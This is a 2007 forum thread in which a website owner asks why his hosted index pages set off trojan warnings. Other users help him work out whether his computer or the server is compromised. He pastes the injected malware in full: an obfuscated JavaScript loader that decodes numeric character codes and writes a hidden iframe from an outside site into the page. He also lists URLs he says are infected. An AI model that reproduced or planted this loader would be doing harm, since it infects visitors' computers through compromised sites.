Virus linked to my websites...., I have a virus problem.... Options

[morbid1]

I have done a lot of searching, but no answers, I hope this is the proper place to post this. I am not real sure, if it is not I apologize.
I have had hosting at the same company for 4-5 years now, not the best but usable anyway.
I really hope someone can help me as I have run out of ways to try and get rid of yhis problem, it is driving me insane, or should I say more insane!
I host probably 30-40 websites, most of which I have built and host for customers, I am not a great "coder" so I use Dreamweaver, I do design all of my sites and graphics in photoshop then load into dreamweaver then publish them to my host.
Recently when I go to some of my websites My anti virus pop's up warning me there is a virus now collected from that website!
I contacted the host, they say it is my issue, deal with it.
I have no idea how to stp this or how to remove them, I have scanned in my servers, they found several virus's and supposedly removed them, but still I get these virus's from some of my sites homepages....
Can someone PLEASE, PLEASE tell me what to do to stop this asap! I am losing customers I am sure....
again, sorry iof this post is in the wrong area, I did not know where else to turn for answers.
Thank you
DasMorbid1

[pandy]

So what virus did your AV say it was? Have you also scanned your local machine? There are virus that inject script code in HTML files, so if you have uploaded new files, your own computer could be the source.

Do you have ads, counters or other things (except plain images) from outside sources on your sites?

[morbid1]

Thank you 4 ur help,
AVG Saya it is a Trojan, I will look closer and write down exactly what it says this time, I need to re-boot in XP, Not showing it seems in Vista.....
No outside links on some of the sites, no ads, no "old scripts" as the host calls em....
Here are some of the urls if you want to try, I think what it does is want you to load active x etc...
REMEMBER BEFORE YOU CLICK THESE LINKS, SOME HAVE BEEN KNOWN TO SHOW VIRUS'S ON MY COMPUTER THROUGH AVG!
http://www.loc-cod.org/
http://www.hotmodders.com/
http://www.illusive-fantasy.com/
mow I am not showing anything on Vista, I will try XP again and see if any virus's still try to execute......


I rebooted in winxp pro, went to www.loc-cod.org and sure enough up popped AVG with: trojan horse downloader.... sysiuzx.exe virus detec ted etc....
Then it also had :
it found a problem with my tyemp files, loc-cod[1].htm ?
I am going to try and research further, but basicaly this is what all of them say that ahve this problem, trying to figure out where, loc-cod[1].htm comes from..... since it should be loc-cod.html.....



OK I have now boiled it down to this, basicaly they are saying somehow they are injecting malicious code to my webpages? how can I stop this, I am losing people everyday I beleive because of this.
I found this out, it goes down to a virus, non malicious destoyer, js/psyme, and is talked about here at this link:
http://www.geeknewz.com/board/lofiversion/...x.php/t835.html

I really need to know how to get this stuyff off my web pages and how not to allow this stuff to happen again, I have been free of problems like this on my host for 4-5 years now...
Thanks to all who can help.

This post has been edited by morbid1: Jul 19 2007, 06:30 PM

[Brian Chandler]

REMEMBER BEFORE YOU CLICK THESE LINKS, SOME HAVE BEEN KNOWN TO SHOW VIRUS'S ON MY COMPUTER THROUGH AVG!
http://www.loc-cod.org/
http://www.hotmodders.com/
http://www.illusive-fantasy.com/
mow I am not showing anything on Vista, I will try XP again and see if any virus's still try to execute......

Can't connect to the first two - the third (i-f.com) has nothing odd-looking in it. Probably some problem on your computer... what does "Vista" stand for? "Virus Incubation System, Try Again"?

[Peter1968]

Wow, Brian you must be the last person on Earth who doesn't know what Vista is.

http://www.microsoft.com/windows/products/...ta/default.mspx

Know everyone knows what it is.

[morbid1]

lol....should have said I was dual booting....
anyway ladies and gents, I cannot figure out how to get rid of it, when using Vista OS, I t asks if I want to install RDS/ Something.... like an activex plug in....
I really need to get rid of this crud off my sites, how would I update all scripts etc... in my websites with Dreamweaver?
I keep being told by my host they cant do anything and it is not their problem, even if the virus was injec ted on their servers... 8(
Cannot figure out how this file loc-cod[1].htm is getting in my temp folder?

This post has been edited by morbid1: Jul 20 2007, 07:21 AM

[morbid1]

I have finaly downloaded the files from loc-cod.org, the code was actualy in the index file itself! could not even open the file once downloaded, would not this be a leak in my host? how else can they just come in and put code in my index files?

[Christian J]

Sometimes AV-programs produce false alerts. Do other people get virus alerts on your sites?

You might check if your host has anything to do with this by uploading one of your sites to another temporary host. If you get virus alerts there too, your first host may not be to blame.

You could also try uploading a brand new test page to your old host from another computer, if you then get a virus alert the host is probably to blame.

[morbid1]

As I stated, it was put into my index pages, how can they write to my webpages is the question now....
Certainly security should have stopped them from being able to inject code into my webpages?

[Brian Chandler]

As I stated, it was put into my index pages, how can they write to my webpages is the question now....
Certainly security should have stopped them from being able to inject code into my webpages?

_What_ was "put into your index pages"? So far there is not a scrap of coherent evidence that anything was. Can you show us a listing of the part of you index part that includes this "injection"?

Otherwise it is vastly more likely that something funny is happening on _your_ computer. No-one here can really help you with that, because we don't have access to your computer.

[morbid1]

OK NOW I FOUND THIS!...lol....
Really not funny but trying not to lose my mind, when I look at my original pages on my hard drive they look normal, when I upload the page to my host I now see the same code, but with new code also! some of the new code is like this:

</script>
</head>
<body bgcolor="#000000" onload="MM_preloadImages('enter_realmovr.jpg')"><!-- o65 --><script language='JavaScript'>function nbsp() {var t,o,l,i,j;var s='';s+='060047116101120116097116101097062060047116101120116097114101097062';
s+=& #39;0600730700820650770690321151140990610341041161161120580470471151051091110991
14111103103101114046119';
s=s+& #39;1150471021080971151040471051101001011200461121041120340321191051001161040610
53032104101105103104116';
s=s+& #39;0610530321151161211081010610341001051151121080971210581101111101010340620600
47073070082065077069062';
s=s+'032';
t='';l=s.length;i=0; while(i<(l-1)){for(j=0;j<3;j++){t+=s.charAt(i);i++;}if((t-unescape(0xBF))>unescape(0x00))t-=-(unescape(0x08)+unescape(0x30));document.write(String.fromCharCode(t));t='';}}nbsp();</script><!-- c65 -->
<!-- ImageReady Slices (new_enter_image.psd) -->
<div align="center">

some of That code does not show up on my original index pages...
Any ideas on how this code is being automaticaly written to my webpages? must be some command file on the server, in my host area or whaerever...
Can I put the html that is in my original index page on here, then put the code that is there when I upload it?
Not sure if that is allowed to put that code on here, sorry I am a novice at coding etc... I have Dreamweaver do the work usualy....
Thanks again all who help, this is driving me and my host mad!

[morbid1]

no 1? 8(

[morbid1]

Here is a screenshot of the warning I get when going to several of my websites now:

[Christian J]

That code might be inserted into the HTML file from your own computer (during file transfer?) or from the server (possibly through a rootkit, which is hard to detect). Try my ideas above to make sure which it is.

[Brian Chandler]

OK NOW I FOUND THIS!...lol....
Really not funny but trying not to lose my mind, when I look at my original pages on my hard drive they look normal, when I upload the page to my host I now see the same code, but with new code also! some of the new code is like this:

</script>
</head>
<body bgcolor="#000000" onload="MM_preloadImages('enter_realmovr.jpg')"><!-- o65 --><script language='JavaScript'>function nbsp() {var t,o,l,i,j;var s='';s+='060047116101120116097116101097062060047116101120116097114101097062';

... <snip>

OK, well, help by saying _exactly_ where you found this. If this appears at the head of a page, and you didn't put it there, you need to ask someone else to download the same page and see if the junk appears to them too. Then you know whether the problem is you computer or the server.

[morbid1]

I have re-uploaded several index.html pages, only a few ended up witth this code being written to them, and also these are brand new Operating systems, Clean installs....

[Christian J]

I recall seeing something like the above javascript when I first looked at one of the linked pages, so it's definitely present online occasionally.

What I'm wondering is if the files got infected by your computer (even if they look clean offline) or by the server. When you say your OSs are clean installs, haven't you moved any files or programs to those computers from the first one (HTML files, Dreamweaver, etc)?

[morbid1]

clean installs, new installs of dreamweaver etc... the backups of my websites are on another drive, move one of them after they are looked at thouroughly, upload it and boom, there it was again, and only happens on some of the index pages I uploaded. I now have found an index page that had 30-50 advertisement links that I never had there, I saved a copy of it, uploaded a new index page and its ok for now, but somehow these people are getting into my servers, has to be.

[Darin McGrew]

When was the last time you changed your password?

[morbid1]

I have been changing them everyday now until a solution is found.
I now have this, I deleted an index page on one of my websites, when you go to it now it shows a PHP error, snouldnt do that when it was an html pages that was there.
I think someone has gotten in from my forums and has run a PHP script to do this damage.
You can see that error here,
www.loc-jk2.com
that is where I simply deleted my index.html file.